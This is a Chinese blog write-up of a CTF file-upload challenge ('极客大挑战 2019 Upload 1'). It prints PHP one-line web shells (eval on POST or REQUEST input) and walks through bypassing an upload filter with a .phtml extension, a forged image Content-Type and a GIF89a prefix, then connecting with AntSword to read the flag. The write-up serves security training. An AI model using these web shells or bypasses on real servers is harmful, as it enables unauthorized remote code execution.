[极客大挑战 2019]Upload 1

于 2023-11-07 14:53:38 发布
阅读量218 收藏 2
点赞数 2
分类专栏: CTF做题笔记 文章标签: web安全 网络安全 php 前端 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73734159/article/details/134267317
版权

题目环境:
image.png

根据题目和环境可知此题目是一道文件上传漏洞

编写一句话木马脚本
<?php @eval($_POST['shell']);?>
将脚本文件更改为jpg图片文件
我这里是flag.jpg
image.png
image.png
image.png
上传文件并burpsuite抓包
image.png
Repeater重放
image.png
image.png

报错一句话木马里面有<?字符

换一种一句话木马
继续编写木马脚本
<script language="php">@eval($_POST['shell']);</script>
image.png
保存为flag.phtml文件

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
因为前几个都被过滤了,所以选择使用phtml后缀

上传抓包
image.png
修改为image/jpeg图片格式
Repeater重放Send
image.png
不是图片
通过GIF89a进行绕过
GIF89a<script language="php">@eval($_POST['shell']);</script>

使文件为动态GIF文件绕过检测

image.png
访问upload/flag.phtml文件
image.png
上传成功
复制URL链接
使用中国蚁剑连接
image.png
在/根目录下找到flag文件
访问flag文件
image.png
image.png
得到flag:
flag{5359382e-ae88-42a8-8116-8c85a02fb21f}

白猫a~
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2498
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
【BUUCTF]极客挑战 2019Upload1 write up
GZWZ_的博客
04-23 869
文件上传冲啊!!!!!!
BUUFCTF—[极客挑战 2019]Upload 1
国内一线红队,擅长攻防渗透,APT
05-12 1125
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客与团队-极客与团队1
08-03
极客与团队》这本书由Brian W. Fitzpatrick和Ben Collins-Sussman共同撰写,两位作者来自Google,具有丰富的项目开发和管理经验,特别是在Subversion的开发中扮演了重要角色。这本书聚焦于软件开发中的非技术因素...
极客学院 idea教程 含2017.1版本 PDF及两个视频
11-16
【标题】"极客学院 idea教程 含2017.1版本 PDF及两个视频" 涵盖了IntelliJ IDEA的使用方法和实践,是针对2017.1版本的详细教学资源。IntelliJ IDEA是一款流行的Java集成开发环境(IDE),由JetBrains公司开发,广泛...
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
21.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime1
08-03
在本文中,我们将探讨2019年GeekPwn极客大赛中的安全攻防技术,这是一个展示最新网络安全技术的平台。作者通过亲身体验,分享了大赛中的亮点和精彩瞬间,涵盖了云安全、隐私保护、机器学习、智能设备安全等多个领域...
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
ApacheFlink极客挑战赛垃圾图片分类赛道冠军方案分享.pdf
01-09
在"Apache Flink极客挑战赛垃圾图片分类赛道冠军方案分享"中,参赛者利用Flink的高效处理能力来解决图像分类问题,特别是在智慧城市和互联网应用中,这种技术具有广泛的应用潜力。 1.1 Flink与Intel Analytics Zoo...
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip
最新发布
04-23
【标题解析】:“勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip”这个标题暗示了一个与数学和几何学相关的项目或活动,可能是一个教育游戏或者教学资源。"勇士的奇妙大冒险"可能是游戏的主题,...
极客飒GIXXER155使用说明书.pdf
09-16
摩托车的性能在很大程度上取决于各部件的维护状态,包括发动机、传动系统、悬挂等。高质量的维护能够确保摩托车展现其最佳性能,并且可以预防潜在的故障。使用说明书会提供具体的操作指南,让车主按照制造商的建议来...
Python极客项目编程
06-08
在本书中,你会看到14个令人兴奋的项目,旨在鼓励你探索Python编程的世界。这些项目涉及广泛的主题,如绘制类似万花尺的花纹、生成ASCII码艺术图、3D渲染,以及根据音乐同步投射激光图像。除了本身很有趣之外,这些...
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值